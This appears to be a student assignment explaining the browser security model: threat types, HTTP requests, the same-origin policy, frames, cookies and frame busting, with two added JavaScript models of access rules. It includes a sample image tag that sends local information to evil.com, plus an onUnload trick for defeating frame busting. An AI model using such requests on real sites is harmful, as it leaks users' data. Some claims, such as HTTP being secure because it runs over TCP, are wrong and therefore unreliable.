Browser Security Model

THE UNIVERSITY OF DODOMA

College of Informatics and Virtual Education
PROGRAM: B Sc. Computer and Information Security
ASSIGNMENT NO. 1

COURSE NAME: Network Security
COURSE CODE: CS 222
COURSE INSTRUCTOR: Khamis Fereji
Topic: Browser security model

Participants:

S/n | Name              | Registration No.
1   | MAKAME, MAKAME H  | T/UDOM/2010/00410
2   | TWALIB, MOHAMED A | T/UDOM/2010/00441
4   | MBEYELA, JOAN     | T/UDOM/2010/00415
5   | MWOMBEKI, JUDITH  | T/UDOM/2010/00428


Introduction

The browser security model is a category of Web security. Web security includes the policies, services and mechanisms for preventing, detecting and recovering from Web attacks.

Goals of web security

- Browsing the Web safely. Users should be able to visit a variety of websites without being harmed.
- Secure Web applications. Applications delivered over the Web should have the same secure state as stand-alone applications.

[Figure: browser communication on a network, showing Website, Browser and Network.]

Web Threats Model

There are three types of web threat models.

Web attacker

Controls a malicious website, e.g. attacker.com, and can freely obtain an SSL/TLS certificate for the site. A victim is lured into visiting the website by enticing content, search results, or placement by an ad network. This attacker has no control of the network.

Network attacker

It is divided into two types of attacks:

- Passive attacks. These are in the nature of eavesdropping on, or monitoring of, transmissions. The goal of the attacker is to obtain information that is being transmitted. The attacker does not affect system resources but only attempts to learn or make use of information. Example: wireless eavesdropper.
- Active attacks. This type involves modification of the data stream or creation of a false stream. It attempts to alter system resources or affect their operation. Examples: evil router and DNS poisoning.

Malware attacker

The attacker controls the user's machine, exploits application bugs such as buffer overflows (because browsers enable remote code execution), and convinces a user to install malicious content such as viruses by masquerading (the attacker may pretend to be an anti-virus).

The Browser as an OS and Execution Platform

Hypertext Transfer Protocol

It is an application-layer protocol under TCP, hence it is secured. It has two basic types of messages, the HTTP request and the HTTP response. Just as an operating system has a disk for storage, HTTP makes use of cookies. HTTP is stateless; cookies give it state.

HTTP REQUEST

The first line gives the Method, File and HTTP Version; the lines that follow are Headers.

    GET /index.html HTTP/1.1
    Accept: image/gif, image/x-bitmap, image/jpeg, */*
    Accept-Language: en
    Connection: Keep-Alive
    User-Agent: Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)
    Host: www.example.com
    Referer: http://www.google.com?q=dingbats

For Methods:

- GET - No side effect.
- POST - Possible side effect.


Rendering Content

Each browser window or frame:

- Loads content
- Renders: processes HTML and scripts to display the page. May involve images, sub frames.
- Responds to events

Events can be:

o User actions: OnClick.
o Rendering: OnLoad.
o Timing: setTimeout().

Same-Origin Policy

The most important security concept within modern browsers is the idea of the same-origin policy. The principal intent of this mechanism is to make possible largely unrestrained scripting and other interactions between pages served as part of the same site (understood as having a particular DNS host name, or part thereof), while almost completely preventing any interference between unrelated sites.

Same-Origin policy for Document Object Model (DOM) access

The DOM is an object-oriented interface used to read and write documents. With no additional qualifiers, the term "same-origin policy" most commonly refers to a mechanism that governs the ability of JavaScript and other scripting languages to access DOM properties and methods across domains. In essence, the model boils down to this three-step decision process:

1. If protocol, host name, and (for browsers other than Microsoft Internet Explorer) port number for two interacting pages match, access is granted with no further checks.

2. Any page may set the document.domain parameter to a right-hand, fully-qualified fragment of its current host name (e.g., do.car.sec.com may set it to sec.com, but not ec.com). If two pages explicitly and mutually set their respective document.domain parameters to the same value, and the remaining same-origin checks are satisfied, access is granted.

3. If neither of the above conditions is satisfied, access is denied.
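
The three-step decision above, modelled as an added JavaScript example (not part of the original assignment and not any browser's own code). The page objects, the function names and the `ignorePort` option (standing in for the Internet Explorer behaviour) are assumptions, as is reading "remaining same-origin checks" as a protocol match.

```javascript
// Model of the three-step DOM same-origin decision described above.
// A page is { url, documentDomain? }; all names here are hypothetical.

// Step 2 precondition: the value must be the host itself or a right-hand
// fragment that starts at a label boundary (sec.com yes, ec.com no).
function isValidDocumentDomain(hostname, value) {
  const host = hostname.toLowerCase();
  const v = String(value).toLowerCase();
  if (!v.includes(".")) return false; // simplification: reject bare suffixes like "com"
  return host === v || host.endsWith("." + v);
}

function canAccessDom(pageA, pageB, { ignorePort = false } = {}) {
  const a = new URL(pageA.url);
  const b = new URL(pageB.url);
  const sameProtocol = a.protocol === b.protocol;

  // Step 1: protocol, host name and (unless ignorePort) port all match.
  const samePort = ignorePort || a.port === b.port;
  if (sameProtocol && a.hostname === b.hostname && samePort) {
    return { allowed: true, reason: "same-origin" };
  }

  // Step 2: both pages explicitly set document.domain to the same valid value.
  const da = pageA.documentDomain;
  const db = pageB.documentDomain;
  if (da !== undefined && db !== undefined &&
      da.toLowerCase() === db.toLowerCase() &&
      isValidDocumentDomain(a.hostname, da) &&
      isValidDocumentDomain(b.hostname, db) &&
      sameProtocol) { // assumption: "remaining checks" means protocol match
    return { allowed: true, reason: "document.domain" };
  }

  // Step 3: neither condition holds.
  return { allowed: false, reason: "cross-origin" };
}

// Constructed sample pages.
const carPage = { url: "http://do.car.sec.com/a", documentDomain: "sec.com" };
const mailPage = { url: "http://mail.sec.com/b", documentDomain: "sec.com" };
const silentPage = { url: "http://mail.sec.com/b" }; // never set document.domain
console.log(canAccessDom(carPage, mailPage));
console.log(canAccessDom(carPage, silentPage));
```

The second call is denied because the relaxation must be mutual: one page lowering its document.domain does not open the other page to it.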

HTML image Tags

Security issues with image tags as content:

- Communicate with other sites:
    <img src="http://evil.com/pass-localinformation.jpg?extra_information">
- Spoof other sites by adding logos that fool a user.

Note: A web page can send information to any site.

JavaScript onError

Basic function: triggered when an error occurs loading a document or an image.

Example:

    <img src="image.gif" onerror="alert('The image cannot be loaded')">

Runs the onError handler if the image does not exist and cannot load.

Remote Scripting

Goal: exchange data between a client-side app running in a browser and a server-side app, without reloading the page.

Methods:

- Java Applet/ActiveX control/Flash: can make HTTP requests and interact with client-side JavaScript code, but requires LiveConnect (not available on all browsers).
- XML-RPC: open, standards-based technology that requires XML-RPC libraries on the server and in client-side code.
- Simple HTTP via a hidden IFRAME: an IFRAME with a script on a web server (or database of static HTML files) is by far the easiest of the three remote scripting options.

Note: A web page maintains bi-directional communication with the browser (until the user closes/quits).

Isolation

In isolation, the applications on the user's machine should be well isolated from unknown interactions with untrustworthy web/browser applications. The mechanisms used are explained as follows.

Running remote code is not encouraged. An attacker can compromise a user's integrity or confidentiality by doing the following: compromise your machine, install a malware rootkit, transact on your accounts, read your information, steal passwords and read your email.


Frame and iFrame

A window may contain frames from different sources:

- Frame: rigid division as part of a frameset
- iFrame: floating inline frame

Why use frames?

- Delegate screen area to content from another source.
- Browser provides isolation based on frames.
- Parent may work even if frame is broken.

Frame Communication

PostMessage is the new API for inter-frame communication. It is supported in the latest browsers such as Mozilla Firefox, Opera, Microsoft Internet Explorer, etc. It has a secured fragment identifier messaging. It is not a secure channel because it offers integrity and authentication but not confidentiality.

Frame Navigation

- Permissive policy: A frame can navigate any frame. Therefore nothing determines a frame's contents. This has resulted in the Guninski attack.
- Window policy: A frame can navigate frames in its own window. This has led to gadget hijacking.
- Parent policy: A frame can navigate its children.
- Ancestor policy: A frame can navigate its descendants.

Table 1 Analogy of OS with Browser

                | Operating system                     | Web browser
Primitives      | System calls, Processes, Disk        | Document object model, Frame, Cookies/local Storage
Principals      | Users, Discretionary access control  | Mandatory access control
Vulnerabilities | Buffer overflow, Root exploit        | Cross-site scripting, Cross-site request forgery, Cache history attacks


Basic HTTP Cookies

A cookie is used by an origin website to send state information to a user's browser, and by the browser to return the state information to the origin site.

Cookie security policies

Uses:

- User authentication
- Personalization
- User tracking, e.g. Doubleclick (3rd party cookies)

The browser will store at most 20 cookies/site, 3 KB/cookie.

Origin is the tuple <domain, path>:

- Can set cookies valid across a domain suffix

Secure cookies

- Provides confidentiality against network attacker
- Browser will only send cookie back over HTTPS
- Problems: no integrity
  o network attacker can rewrite secure cookies over HTTP
  o can log user into attacker's account

HttpOnly cookie

Cookie sent over HTTP(S), but not accessible to scripts:

- Cannot be read via document.cookie
- Also blocks access from XMLHttpRequest headers
- Helps prevent cookie theft via XSS
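
The Secure and HttpOnly rules above, together with the <domain, path> scoping, modelled as an added JavaScript example (not part of the original assignment and not a browser's own cookie code). The function names and the sample Set-Cookie values are constructed for illustration, and only the Secure, HttpOnly, Domain and Path attributes are modelled.

```javascript
// Parse a Set-Cookie header value, keeping only the attributes discussed above.
function parseSetCookie(header) {
  const [pair, ...attrs] = header.split(";").map((s) => s.trim());
  const eq = pair.indexOf("=");
  if (eq < 1) throw new Error("malformed cookie pair");
  const cookie = { name: pair.slice(0, eq), value: pair.slice(eq + 1),
                   secure: false, httpOnly: false, domain: null, path: "/" };
  for (const attr of attrs) {
    const i = attr.indexOf("=");
    const key = (i < 0 ? attr : attr.slice(0, i)).trim().toLowerCase();
    const val = i < 0 ? "" : attr.slice(i + 1).trim();
    if (key === "secure") cookie.secure = true;
    else if (key === "httponly") cookie.httpOnly = true;
    else if (key === "domain") cookie.domain = val.replace(/^\./, "").toLowerCase();
    else if (key === "path" && val.startsWith("/")) cookie.path = val;
  }
  return cookie;
}

// Would the browser attach this cookie to a request for `url`?
// setByHost is the host that sent the Set-Cookie header.
function isSentOn(cookie, setByHost, url) {
  const u = new URL(url);
  if (cookie.secure && u.protocol !== "https:") return false; // Secure: HTTPS only
  const hostOk = cookie.domain
    ? u.hostname === cookie.domain || u.hostname.endsWith("." + cookie.domain)
    : u.hostname === setByHost; // no Domain attribute: host-only cookie
  const prefix = cookie.path.endsWith("/") ? cookie.path : cookie.path + "/";
  return hostOk && (u.pathname === cookie.path || u.pathname.startsWith(prefix));
}

// What document.cookie would expose to page script: HttpOnly cookies are hidden.
function scriptVisible(cookies) {
  return cookies.filter((c) => !c.httpOnly)
                .map((c) => `${c.name}=${c.value}`).join("; ");
}

// Constructed sample headers, as if sent by www.example.com.
const session = parseSetCookie("SID=abc123; Domain=.example.com; Path=/; Secure; HttpOnly");
const theme = parseSetCookie("theme=dark; Path=/");
console.log(isSentOn(session, "www.example.com", "https://shop.example.com/cart"));
console.log(isSentOn(session, "www.example.com", "http://shop.example.com/cart"));
console.log(scriptVisible([session, theme]));
```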


Browser UI and security indicators

Frame

A frame is a subdivision of a Web browser window and can act like a smaller window.

- Embed HTML documents in other documents:
    <iframe name="myframe" src="http://www.google.com/"> This text is ignored by most browsers. </iframe>

Frame Busting

Preventing a Web page from being displayed within a frame using JavaScript code.

- Example: opening the login page in a frame will display the correct passmark image.
- The typical source code for a frame busting script is:

    <script type="text/javascript">
    if (top != self) top.location.replace(location);
    </script>

Better Frame busting

- Problem: JavaScript OnUnload event
    <body onUnload="javascript: cause_an_abort ;)">
- Solution:
    if (top != self) top.location.href = location.href
    else { … code of page here … }

Conclusion

Browser security is among the most challenging security fields, as threats and vulnerabilities are always increasing.


